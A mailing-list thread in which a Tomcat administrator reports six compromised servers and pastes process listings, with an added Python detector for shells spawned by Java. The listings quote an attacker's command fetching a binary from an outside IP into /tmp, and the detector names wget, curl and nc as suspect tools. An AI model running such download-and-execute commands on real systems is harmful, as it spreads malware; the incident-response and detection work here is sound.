Hello Dan,

Nope, the attacker is executing locally the following:

tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid

And then it launches squid, which tries to connect via ssh to various places.

Right now it's time to leave the office, but in a few hours I will paste in
pastebin access logs, config files, wherever you tell me.

This is my pstree:

[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
     ├─atop
     ├─crond
     ├─dbus-daemon
     ├─events/0
     ├─events/1
     ├─events/2
     ├─events/3
     ├─httpd───8*[httpd]
     ├─irqbalance
     ├─2*[iscsid]
     ├─iscsiuio───3*[{iscsiuio}]
     ├─java─┬─sh───wget
     │      └─263*[{java}]
     ├─khelper

By the way, the logfiles are really big, 200 MB each one; I'll try to set up a
Dropbox account so I can share them.

Thanks and regards

Saludos.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>
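An added example, not part of this thread, that automates the check done by eye in the ps and pstree output above: it parses `ps -eo user,pid,ppid,args` output and flags shells or download tools whose ancestry includes a Java process (the `java─sh───wget` chain). The sample ps output is constructed and uses a documentation IP address, not the one in the listing.

```python
import os
import re

# Constructed sample of `ps -eo user,pid,ppid,args` output (not from the thread),
# modelled on the listing above: the tomcat-owned JVM has spawned a shell that is
# fetching a binary into /tmp.
SAMPLE_PS = """\
USER       PID  PPID ARGS
root         1     0 /sbin/init
root      2210     1 /usr/sbin/httpd
tomcat    8800     1 /usr/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
tomcat    8882  8800 sh /tmp/4.sh
tomcat    8893  8882 wget http://203.0.113.10/.xy/squid32 -O /tmp/squid
root      3100     1 crond
"""

# Commands an application server's JVM normally has no reason to spawn.
SUSPECT_CMDS = {"sh", "bash", "dash", "wget", "curl", "nc", "perl", "python"}


def parse_ps(text):
    """Return {pid: (user, ppid, args)} from `ps -eo user,pid,ppid,args` output."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header row
        user, pid, ppid, args = line.split(None, 3)
        procs[int(pid)] = (user, int(ppid), args)
    return procs


def suspicious_children(procs, parent_pattern=r"\bjava\b"):
    """Return (pid, user, cmd, args, ancestor_pid) for every process whose command
    is in SUSPECT_CMDS and which descends from a process matching parent_pattern."""
    hits = []
    for pid, (user, ppid, args) in procs.items():
        cmd = os.path.basename(args.split()[0])
        if cmd not in SUSPECT_CMDS:
            continue
        cur = ppid
        while cur in procs:  # walk up until init's parent (pid 0), which is absent
            _, cur_ppid, cur_args = procs[cur]
            if re.search(parent_pattern, cur_args):
                hits.append((pid, user, cmd, args, cur))
                break
            if cur_ppid == cur:  # guard against a malformed self-parented entry
                break
            cur = cur_ppid
    return sorted(hits)


if __name__ == "__main__":
    for pid, user, cmd, args, jvm in suspicious_children(parse_ps(SAMPLE_PS)):
        print(f"pid {pid} ({user}) {cmd!r} under java pid {jvm}: {args}")
```

Run it against live output with `ps -eo user,pid,ppid,args | python3 this_script.py` after replacing `SAMPLE_PS` with `sys.stdin.read()`.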

2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>:

> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
> lsantagost...@gmail.com> wrote:
>
> > Hello list,
> >
> > I'm facing an issue in 6 Tomcat servers that are getting penetrated and
> > they are executing malicious scripts on my server.
>
> Can you share more about what they are doing?  It might give some clues as
> to how they are accessing your machines.  For example, if they are
> deploying a WAR file to your server, it could mean that they have access to
> the Manager application on your server.
>
> Any details you can share, might be helpful.
>
> > I'm using 7.0.53 on my servers, running CentOS 5.8.
> >
> > Let me know what information you need.
>
> Do you have an access log?  If not, enable one.  If the attacker is not
> deleting it, it could show you more about who they are and what requests
> they are executing to access your server.  Assuming they are entering
> through your application and not some other way.
>
> Dan
>
> >
> > PS: This is my first mail to this list, so I apologize for this not
> > gentle presentation.
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
>
